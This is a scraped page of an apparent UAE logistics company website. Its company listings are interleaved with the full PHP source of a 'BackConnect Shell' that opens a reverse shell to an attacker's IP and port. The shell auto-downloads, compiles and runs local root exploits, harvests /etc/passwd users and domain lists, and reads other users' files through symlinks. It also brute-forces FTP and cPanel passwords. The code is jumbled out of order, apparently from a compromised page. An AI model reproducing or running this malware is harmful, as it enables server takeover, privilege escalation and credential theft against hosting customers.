#si',$exploit_db,$list); foreach($list[1] as $listx) { preg_match('#(.*?)#si',$listx,$exploit); fwrite($socket,"[+] ".$exploit[2]." "); print("[+] ".$exploit[2]."
"); fwrite($socket,"Trying pwn this server with this exploit "); print("Trying pwn this server with this exploit
"); fwrite($socket,"Downloading => ".$exploit[1]." "); print("Downloading => ".$exploit[1]."
"); ob_flush();flush(); $download = $this->download($exploit[1]); if($download != false) { fwrite($socket,"File downloaded saved as $download "); print("File downloaded saved as $download
"); fwrite($socket,"Trying compile to $download file "); print("Trying compile to $download file
"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled "); print("File compiled
"); fwrite($socket,"Setting chmod options "); print("Setting chmod options
"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..! "); print("Running exploit..!
"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile "); print("File doesn't compile
"); ob_flush();flush(); } } else { fwrite($socket,"File doesn't download "); print("File doesn't download
"); ob_flush();flush(); } } fwrite($socket,"==================== Possible Exploits ===================== "); print("==================== Possible Exploits =====================
"); ob_flush();flush(); } fwrite($socket,"Searching 1337day for local root exploits.. "); print("Searching 1337day for local root exploits..
"); ob_flush();flush(); $day1337 = $this->curl("http://www.1337day.com/search","agree=Ok&dong=$version&submit_search=Submit"); preg_match_all("#(.*?)#si",$day1337,$exploits); if($exploits[1]) { fwrite($socket,"==================== Possible Exploits ===================== "); print("==================== Possible Exploits =====================
"); ob_flush();flush(); foreach($exploits[1] as $i => $exploit) { fwrite($socket,"[+] ".$exploits[2][$i]." "); print("[+] ".$exploits[2][$i]."
"); fwrite($socket,"Trying pwn this server with this exploit "); print("Trying pwn this server with this exploit
"); $exploit_link = "http://www.1337day.com/exploit/$exploit"; fwrite($socket,"Downloading => ".$exploit_link." "); print("Downloading => ".$exploit_link."
"); ob_flush();flush(); $download = $this->day1337download($exploit_link); if($download != false) { fwrite($socket,"File downloaded saved as $download "); print("File downloaded saved as $download
"); fwrite($socket,"Trying compile to $download file "); print("Trying compile to $download file
"); ob_flush();flush(); $withoutc = str_replace(".c","",$download); @shell_exec("gcc $download -o $withoutc"); if(file_exists($withoutc)) { fwrite($socket,"File compiled "); print("File compiled
"); fwrite($socket,"Setting chmod options "); print("Setting chmod options
"); @shell_exec("chmod +x $withoutc"); fwrite($socket,"Running exploit..! "); print("Running exploit..!
"); ob_flush();flush(); @shell_exec("./$withoutc"); } else { fwrite($socket,"File doesn't compile "); print("File doesn't compile
"); ob_flush();flush(); } } } fwrite($socket,"==================== Possible Exploits ===================== "); print("==================== Possible Exploits =====================
"); ob_flush();flush(); } else { fwrite($socket,"Not found any exploits "); print("Not found any exploits
"); ob_flush();flush(); } } private function curl($site,$post=null) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$site); if($post != null) { curl_setopt($ch,CURLOPT_POSTFIELDS,$post); } $exec = curl_exec($ch); curl_close($ch); return $exec; } private function download($url) { preg_match('#/exploits/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $url = str_replace("exploits","download",$url); $openurl = @file_get_contents($url); if($openurl && file_put_contents($filename,$openurl)){ return $filename; } else { return false; } } private function day1337download($url) { preg_match('#/exploit/(.+)#si',$url,$filename); $filename = $filename[1].".c"; $data = $this->curl($url,"agree=Ok"); preg_match("#
(.*?)
#si",$data,$content); if(file_put_contents($filename,$content)) { return $filename; } else { return false; } } private function grab_users($socket) { $read = file("/etc/passwd"); $x0x = ""; foreach($read as $text) { $text = trim($text); $user = explode(":",$text); $user = $user[0]; $xox .= $user." "; fwrite($socket,$user." "); print($user." "); } fwrite($socket,"Grabbed ".count($read)." users from /etc/passwd "); print("Grabbed ".count($read)." users from /etc/passwd "); $save = $this->save_as("users",$xox,"wb"); if($save){fwrite($socket,"Saved into file as 'users' ");print("Saved into file as 'users' ");}else{fwrite($socket,"Doesn't save into file ");print("Doesn't save into file ");} } private function catln($file,$socket) { $savefile = uniqid(); @shell_exec("ln -s $file ".$savefile); if(file_exists($savefile)) { fwrite($socket,file_get_contents($savefile)); print(file_get_contents($savefile)); fwrite($socket,"File name $savefile "); print("File name $savefile "); } else { fwrite($socket,"File doesn't read "); print("File doesn't read "); } } private function index($file,$socket) { $etc = file('/etc/passwd'); $count= 0; foreach($etc as $txt) { $txt = trim($txt); $user= explode(":",$txt); $user= $user[0]; $path= "/home/$user/public_html/$file"; @shell_exec("cp $file $path"); if(file_exists($path)) { fwrite($socket,"File created: ".$path." "); print("File created: ".$path." "); $count++; } } fwrite($socket,"Completed "); print("Completed "); fwrite($socket,"File copied into $count dirs "); print("File copied into $count dirs "); } private function getf($file,$socket) { $etc = file('/etc/passwd'); $count = 0; foreach($etc as $txt) { $txt = trim($txt); $user= explode(":",$txt); $user= $user[0]; $path= "/home/$user/public_html/$file"; if(file_exists($path)) { fwrite($socket,"File found: ".$path." "); print("File found: ".$path." "); $content = file_get_contents($path); if($content) { $save = $this->save_as($user."-".$file,$content); if($save){ fwrite($socket,"File is readable,saved into file named $user-$file "); print("File is readable,saved into file named $user-$file "); $count++; } else { fwrite($socket,"File is readable but current dir is not writable "); print("File is readable but current dir is not writable "); } } else { @shell_exec("ln -s $path $user-$file"); if(file_exists($user[0]."-".$file)){ fwrite($socket,"File is read with ln -s method,saved into file named $user-$file "); print("File is read with ln -s method,saved into file named $user-$file "); $count++; } else { fwrite($socket,"File is not readable "); print("File is not readable "); } } } } fwrite($socket,"Grabbed $count files "); print("Grabbed $count files "); } private function domains($socket) { $x0x = ""; $c = 0; $path = "/var/named"; $dir_handle = @opendir($path); if($dir_handle) { while ($file = readdir($dir_handle)) { if (!is_dir($path."/".$file) AND ($file != "..") AND ($file != ".")) { $dosya = str_replace(".db","",$file); fwrite($socket,$dosya." "); print($dosya." "); $x0x .= $dosya." "; $c++; } } $save = $this->save_as("d0mains",$x0x,"wb"); if($save == false){fwrite($socket,"Got domains but can't save into a file this dir is not writable ");print("Got domains but can't save into a file this dir is not writable ");} else { fwrite($socket,"Grabbed $c domains "); print("Grabbed $c domains "); fwrite($socket,"Saved into 'd0mains' "); print("Saved into 'd0mains' "); } closedir($dir_handle); } else { fwrite($socket,"Doesn't read /var/named "); print("Doesn't read /var/named "); } } private function ftp($wordlist,$socket) { fwrite($socket,"Starting ftp crack.. "); ob_flush();flush(); $open = file($wordlist); $userx= array(); foreach($open as $pwd) { $pwd = trim($pwd); fwrite($socket,"Password ".$pwd." trying on all users "); ob_flush();flush(); $users= file('/etc/passwd'); foreach($users as $user) { $user = trim($user); $user = explode(":",$user); $user = $user[0]; $userx[] = $user; } $userx = array_filter($userx); $userx = array_unique($userx); $userx = array_chunk($userx,25); $multi = curl_multi_init(); foreach($userx as $u) { for($i=0;$i<=count($u)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,"ftp://".$this->server_ip); curl_setopt($curl[$i],CURLOPT_USERPWD,trim($u[$i]).":".$pwd); curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl[$i],CURLOPT_TIMEOUT,4); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); usleep(1); }while($active>0); foreach($curl as $cid => $cend) { $data[$cid] = curl_multi_getcontent($cend); if(preg_match('#drw#si',$data[$cid])) { fwrite($socket,"Found username: $u[$cid] , password: $pwd "); print("Found username: $u[$cid] , password: $pwd "); $save = $this->save_as("ftps.txt","Found username: $u[$cid] , password: $pwd ","ab"); ob_flush();flush(); } else { fwrite($socket,"Not found $u[$cid]:$pwd "); print("Not found $u[$cid]:$pwd "); ob_flush();flush(); } curl_multi_remove_handle($multi,$cend); } } } } private function cpanel($wordlist,$socket) { fwrite($socket,"Starting cpanel crack.. "); ob_flush();flush(); $open = file($wordlist); $userx= array(); foreach($open as $pwd) { $pwd = trim($pwd); fwrite($socket,"Password ".$pwd." trying on all users "); ob_flush();flush(); $users= file('/etc/passwd'); foreach($users as $user) { $user = trim($user); $user = explode(":",$user); $user = $user[0]; $userx[] = $user; } $userx = array_filter($userx); $userx = array_unique($userx); $userx = array_chunk($userx,25); $multi = curl_multi_init(); foreach($userx as $u) { for($i=0;$i<=count($u)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,"https://$this->server_ip:2083/login/?login_only=1"); curl_setopt($curl[$i],CURLOPT_POSTFIELDS,"user=".trim($u[$i])."&pass=$pwd"); curl_setopt($curl[$i],CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl[$i],CURLOPT_SSL_VERIFYHOST,0); curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl[$i],CURLOPT_TIMEOUT,4); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); usleep(1); }while($active>0); foreach($curl as $cid => $cend) { $data[$cid] = curl_getinfo($cend); if($data[$cid]['http_code'] != 401) { fwrite($socket,"Found username: $u[$cid] , password: $pwd "); print("Found username: $u[$cid] , password: $pwd "); $save = $this->save_as("cpanels.txt","Found username: $u[$cid] , password: $pwd ","ab"); ob_flush();flush(); } else { fwrite($socket,"Not found $u[$cid]:$pwd "); print("Not found $u[$cid]:$pwd "); ob_flush();flush(); } curl_multi_remove_handle($multi,$cend); } } } } private function save_as($filename,$content,$type='ab') { $fopen = fopen($filename,$type); if($fopen) { fwrite($fopen,$content); fclose($fopen); return true; } else { return false; } } } ?>
Group Companies
Maltrans Emirates L.L.C (Bur Dubai)
Maltrans Emirates (Dubai Cargo Village)
Maltrans Logistics FZ (Jebel Ali)
Al Ghaith Shipping Co. L.L.C.
M.S. Al Ghaith Cargo EST. (Abu Dhabi)

Services
 
News
new1
your_ip = $yip; $this->your_port = $yp; $this->server_ip = $sip; $this->timeout = $t; print("aBu SaeeD BackConnect Shell"); print("aBu SaeeD BackConnect Shell
"); print("Your ip is $this->your_ip
"); print("Your port is $this->your_port
"); print("Server ip is $this->server_ip
"); print("Timeout seconds $this->timeout

"); print("Trying to create shell process $this->your_ip with $this->your_port on $this->server_ip
"); ob_flush(); flush(); $this->createshell(); } private function createshell() { $socket = @fsockopen($this->your_ip,$this->your_port,$errno,$errstr,$this->timeout) or die("Unfortunately could not spawn shell
"); print("Shell process opened to $this->server_ip > $this->your_ip:$this->your_port
"); ob_flush(); flush(); fwrite($socket,"============================================================="); fwrite($socket," .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / | < | |__ _/ ___| | | | / / ___ | Y Y |___ | / __ \ ___| Y | / | / /_/ > |__|_| /__|/ ____|(____ /___ >___| /____/|___| /___ / / / / / / //_____/ "); fwrite($socket,"Welcome to the BackConnect Shell !! "); fwrite($socket,"Written by aBu SaeeD "); fwrite($socket,"Informations "); fwrite($socket,"------------------------------------------------ "); fwrite($socket,"uname -a: ".@shell_exec("uname -a")); fwrite($socket,"whoami: ".@shell_exec("whoami")); fwrite($socket,"id: ".@shell_exec("id")); fwrite($socket,"pwd: ".@shell_exec("pwd")); fwrite($socket,"@ Options "); fwrite($socket,"- exploit = Automatic Search & Download & Run a local root exploit which matches with kernel release "); fwrite($socket,"- grabusr = Grab users from /etc/passwd and save into a file ( users ) "); fwrite($socket,"- domains = List domains from /var/named "); fwrite($socket,"- getf = Find and grab the name given file from all public_html dirs ( only works with /home/USER/public_html servers ) "); fwrite($socket,"- catln = Cat file with ln -s method "); fwrite($socket,"- index = Try copy the name given file to all public_html dirs ( only works with /home/USER/public_html servers ) "); fwrite($socket,"- home = Change dir into home folder "); fwrite($socket,"- ftp = Performs ftp brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) "); fwrite($socket,"- cpanel = Performs cpanel brute-force attack to all users from /etc/passwd ( only works with /home/USER/public_html servers ) "); $this->homefolder = trim(@shell_exec("pwd")); fwrite($socket,"============================================================= "); $result= @shell_exec("whoami"); fwrite($socket,$result); print "Command whoami; "; print $result; ob_flush(); flush(); preg_match("#([0-9]).([0-9]).([0-9]+)-([a-z0-9]+)#si",@shell_exec("uname -r"),$version); $version1 = $version[0]; $version2 = $version[1].".".$version[2].".".$version[3]; print "
";
	while(1)
	{
	$enter = fgets($socket);
	if(preg_match('#exit#',$enter)){fwrite($socket,"Process closed
");exit("Process closed");}
	if(preg_match('#exploit#',$enter)){$this->search($version1,$socket);$this->search($version2,$socket);}
	if(preg_match('#grabusr#',$enter)){$this->grab_users($socket);}
	if(preg_match('#catln (.+)#',$enter,$file)){$this->catln($file[1],$socket);}
	if(preg_match('#index (.+)#',$enter,$file)){$this->index($file[1],$socket);}
	if(preg_match('#getf (.+)#',$enter,$file)){$this->getf($file[1],$socket);}
	if(preg_match('#ftp (.+)#',$enter,$file)){$this->ftp($file[1],$socket);}
	if(preg_match('#cpanel (.+)#',$enter,$file)){$this->cpanel($file[1],$socket);}
	if(preg_match('#domains#',$enter)){$this->domains($socket);}
	if(eregi('home',$enter)){chdir($this->homefolder);}
	if(strpos($enter,'cd ..')){
	$curr = getcwd();
	$explode = explode("/",$curr);
	$c = count($explode);
	unset($explode[$c-1]);
	$explode = array_values(array_filter($explode));
	$path	 = implode("/",$explode);
	$path	 = "/".$path;
	if(!chdir($path)){fwrite($socket,"Can't chdir into $path : Permission denied
");}
	}
	elseif(preg_match('#cd (.+)#',$enter,$dir)){
	$curr = getcwd();
	if(preg_match("#/#si",$dir[1]))
	{
	if(!chdir($dir[1])){fwrite($socket,"Can't chdir into $dir[1] : Permission denied
");}
	}
	else
	{
	if(!chdir($curr."/".$dir[1])){fwrite($socket,"Can't chdir into $curr/$dir[1] : Permission denied
");}
	}
	
	}
	$result= @shell_exec(trim($enter));
	fwrite($socket,$result);
	print "Command ".trim($enter).";
";
	print $result;
	ob_flush(); flush();
	}
	print "
"; fclose($socket); } private function search($version,$socket) { fwrite($socket,"Release: $version "); print("Release: $version
"); ob_flush();flush(); fwrite($socket,"Searching Exploit-DB for local root exploits.. "); print("Searching Exploit-DB for local root exploits..
"); $exploit_db = $this->curl("http://www.exploit-db.com/search/?action=search&filter_description=$version"); if(preg_match('/No results/si',$exploit_db)) { fwrite($socket,"Not found any exploits "); print("Not found any exploits
"); ob_flush();flush(); } else { fwrite($socket,"==================== Possible Exploits ===================== "); print("==================== Possible Exploits =====================
"); ob_flush();flush(); preg_match_all('#
(.*?)  
 
 
Facebook Twitter